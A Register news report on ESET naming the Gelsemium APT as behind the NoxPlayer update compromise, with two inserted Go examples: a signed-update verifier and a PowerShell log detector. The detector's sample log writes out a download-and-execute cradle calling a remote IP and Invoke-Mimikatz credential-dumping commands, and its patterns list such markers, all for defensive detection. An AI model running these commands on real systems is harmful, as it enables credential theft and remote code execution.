
Mysterious Gelsemium APT was behind February compromise of NoxPlayer, says ESET

Cyber security | The Register | 09/06/2021


ESET has published details of an advanced persistent threat (APT) crew that appears to have deployed recent supply chain attack methods against targets including “electronics manufacturers,” although it didn’t specify which.

“Victims of its campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,” said ESET in a research report published today that names the APT crew as Gelsemium.

Those target countries include China, Japan, Mongolia, Taiwan, North and South Korea, and various Middle Eastern countries according to a map drawn up by ESET. The miscreants’ malware, however, has previously included bypasses intended to evade Chinese-made antivirus suites.

ESET illustration showing Gelsemium's known targets


Gelsemium is said to have been behind a supply chain attack targeted at a freeware Android emulator called NoxPlayer, made by BigNox, which boasts of having about 150 million users in total worldwide.

In an incident ESET highlighted in February, before it attributed the activity to this group, BigNox’s update API may have been compromised to deliver malware to selected users under the guise of a legitimate new version, in other words through the very channel the client was built to trust.
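The security-relevant point in an update compromise of this kind is that a client which installs whatever its update API returns will install whatever the attacker on the server side chooses. The Go program below is an added example, not BigNox’s or ESET’s code, and it makes no claim about how NoxPlayer’s updater actually worked: a minimal update client that pins the publisher’s Ed25519 public key, verifies a signed manifest covering version, build number and payload digest, refuses rollbacks, and then shows that a swapped payload, a manifest signed with the wrong key, and a replayed older build are all rejected. The manifest format, version strings and payload bytes are all constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is the metadata a hypothetical update API hands to the client.
// Everything in it is attacker-controlled if the API is compromised; the
// only thing the client trusts is the publisher public key compiled into it.
type Manifest struct {
	Version   string `json:"version"`
	Build     uint64 `json:"build"`     // monotonic counter, used for rollback protection
	SHA256    string `json:"sha256"`    // hex digest of the update payload
	Signature []byte `json:"signature"` // Ed25519 signature over signedBytes(...)
}

// signedBytes fixes the byte string that is signed: version, build and
// payload digest together, so none of them can be swapped independently.
func signedBytes(version string, build uint64, sha string) []byte {
	return []byte(fmt.Sprintf("%s\n%d\n%s\n", version, build, sha))
}

func payloadDigest(payload []byte) string {
	sum := sha256.Sum256(payload)
	return hex.EncodeToString(sum[:])
}

// SignManifest is the publisher side. It belongs on an offline signing host,
// not on the server that serves updates, so compromising the update server
// does not also yield the signing key.
func SignManifest(priv ed25519.PrivateKey, version string, build uint64, payload []byte) Manifest {
	sha := payloadDigest(payload)
	return Manifest{
		Version:   version,
		Build:     build,
		SHA256:    sha,
		Signature: ed25519.Sign(priv, signedBytes(version, build, sha)),
	}
}

// VerifyUpdate is the client side. installedBuild is the build currently
// running; anything not newer is rejected even if it is correctly signed.
func VerifyUpdate(pinnedPub ed25519.PublicKey, installedBuild uint64, m Manifest, payload []byte) error {
	if !ed25519.Verify(pinnedPub, signedBytes(m.Version, m.Build, m.SHA256), m.Signature) {
		return errors.New("manifest not signed by pinned publisher key")
	}
	if m.Build <= installedBuild {
		return errors.New("rollback or replay: build is not newer than the installed one")
	}
	if payloadDigest(payload) != m.SHA256 {
		return errors.New("payload digest does not match signed manifest")
	}
	return nil
}

// Scenario exercises the verifier against a genuine update and three things
// a compromised update API could serve instead. It returns whether each
// candidate was accepted (only the genuine one should be).
func Scenario() (genuine, swappedPayload, forgedManifest, rollback bool) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader) // publisher key; pub is what the client pins
	if err != nil {
		panic(err)
	}
	installed := uint64(41)
	good := []byte("constructed stand-in for the real installer bytes, build 42")
	m := SignManifest(priv, "1.2.3", 42, good)

	genuine = VerifyUpdate(pub, installed, m, good) == nil

	// 1. Server keeps the genuine manifest but swaps the binary for malware.
	swappedPayload = VerifyUpdate(pub, installed, m, []byte("trojanised installer")) == nil

	// 2. Server serves a manifest signed with the attacker's own key.
	_, attackerPriv, _ := ed25519.GenerateKey(rand.Reader)
	forged := SignManifest(attackerPriv, "1.2.3", 42, []byte("trojanised installer"))
	forgedManifest = VerifyUpdate(pub, installed, forged, []byte("trojanised installer")) == nil

	// 3. Server replays an older, genuinely signed but superseded build.
	old := SignManifest(priv, "1.2.2", 40, []byte("old installer"))
	rollback = VerifyUpdate(pub, installed, old, []byte("old installer")) == nil
	return
}

func main() {
	g, s, f, r := Scenario()
	fmt.Printf("genuine=%v swappedPayload=%v forgedManifest=%v rollback=%v\n", g, s, f, r)
}
```

Two caveats worth stating. First, the scheme only helps if the signing key never lives on the update server; a signing key reachable from the compromised API lets the attacker sign whatever they swap in. Second, signature verification protects the delivery channel, not what went into the build: a payload trojanised before signing would verify cleanly, which is why build-pipeline integrity is a separate control.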

First seen in the mid-2010s, Gelsemium has used delivery vectors ranging from plain old spear-phishing at its outset to abuse of the Microsoft Exchange vulnerability seen in Q1 of this year.

Discovery of a new APT is not unusual, but it still adds to the wider body of infosec knowledge, and it makes a change from endless analysis of ransomware gangs’ activities: a useful reminder that not every threat facing internet-connected organisations today is the one making mainstream telly news headlines.

“During our investigation we found victims where Mimikatz was dropped on machines. The operator uses a PowerShell version of the tool, downloaded from a remote server,” added ESET.
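A PowerShell port of Mimikatz pulled from a remote server and run in memory leaves a recognisable trace once PowerShell script block logging (Event ID 4104) is enabled. As an added example that is not part of the ESET report or The Register’s article, the Go program below runs over a handful of constructed script block lines and flags two things: known Invoke-Mimikatz markers, and a download cradle paired with in-memory execution. The sample log, including its IP addresses, is constructed; the patterns are generic ones, not indicators taken from the report.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one alert produced for a logged script block.
type Finding struct {
	Line     int
	Severity string // "high" or "medium"
	Reasons  []string
}

// All patterns are case-insensitive: PowerShell itself is, so a
// case-sensitive match would be bypassed by "iEx" or "invoke-mimikatz".
var (
	// Cradles that fetch remote content over the network.
	downloadCradle = regexp.MustCompile(`(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b)`)
	// Ways of executing fetched content without writing a script to disk.
	inMemoryExec = regexp.MustCompile(`(?i)(\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load)`)
	// Strings specific to PowerShell ports of Mimikatz and its modules.
	mimikatzMarkers = regexp.MustCompile(`(?i)(Invoke-Mimikatz|sekurlsa::|privilege::debug|lsadump::|kerberos::|DumpCreds|\bmimikatz\b)`)
)

// Analyze inspects one decoded script block and returns a Finding, or nil
// when the block matches nothing of interest.
func Analyze(lineNo int, script string) *Finding {
	var reasons []string
	mimi := mimikatzMarkers.MatchString(script)
	cradle := downloadCradle.MatchString(script)
	exec := inMemoryExec.MatchString(script)
	if mimi {
		reasons = append(reasons, "mimikatz marker")
	}
	if cradle {
		reasons = append(reasons, "download cradle")
	}
	if exec {
		reasons = append(reasons, "in-memory execution")
	}
	switch {
	case mimi:
		return &Finding{Line: lineNo, Severity: "high", Reasons: reasons}
	case cradle && exec:
		// Remote content executed straight from memory. The Mimikatz string may
		// exist only in the fetched content, which this log line never shows,
		// so this is medium severity rather than a miss.
		return &Finding{Line: lineNo, Severity: "medium", Reasons: reasons}
	}
	return nil
}

// Scan runs Analyze over every non-empty line of a log export.
func Scan(log string) []Finding {
	var out []Finding
	for i, l := range strings.Split(strings.TrimSpace(log), "\n") {
		l = strings.TrimSpace(l)
		if l == "" {
			continue
		}
		if f := Analyze(i+1, l); f != nil {
			out = append(out, *f)
		}
	}
	return out
}

// SampleLog is constructed for this example; it is not real telemetry.
// Line 4 is a benign download to disk and must not fire.
const SampleLog = `
Get-ChildItem C:\Users\alice\Documents | Sort-Object LastWriteTime
IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
Invoke-WebRequest -Uri https://example.org/report.csv -OutFile C:\Temp\report.csv
iex (iwr http://203.0.113.10/m.txt -UseBasicParsing).Content; Invoke-Mimikatz -DumpCreds
Get-Content .\notes.txt
`

func main() {
	for _, f := range Scan(SampleLog) {
		fmt.Printf("line %d [%s]: %s\n", f.Line, f.Severity, strings.Join(f.Reasons, ", "))
	}
}
```

The cradle-plus-IEX case is deliberately scored medium: the logged line shows only the fetch, and the Mimikatz strings live in whatever came back from the server. Script block logging does, however, record the downloaded script as its own 4104 event when IEX executes it, so the same detector applied to that later event produces the high-severity hit; correlating the two by process and time is what turns the medium into a confirmed incident.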

The antivirus company, which is based in Slovakia, gave a grateful nod to other infosec research firms in its whitepaper, citing work from companies based as far afield as China itself. Back in 2018 Chinese infosec firm Venustech published (PDF, in Chinese) a paper about what ESET now calls Gelsemium, with one concluding sentence in particular sticking out: “The malware delivered from this organization contains a large number of detection and circumvention methods for Chinese anti-virus software.”

ESET itself highlighted in its own analysis that Gelsemium’s malware payload included checks for, among other common consumer endpoint antivirus suites, Qihoo360 and Kaspersky.

The firm’s Thomas Dupuy told The Register: “This antivirus detection is a bit complex; it is used to tweak the behavior of the malware. For example, stopping the execution of certain processes or mechanisms used to drop the next stage and sometimes terminate the execution of the malware. On top of that, standard user or administrator and Windows version add more versatility. For example, if 360 AV is installed and the Windows version is before Windows Vista, it terminates the execution.”

More information is available on ESET’s blog. ®

See the original article here: The Register

Written by: The Register
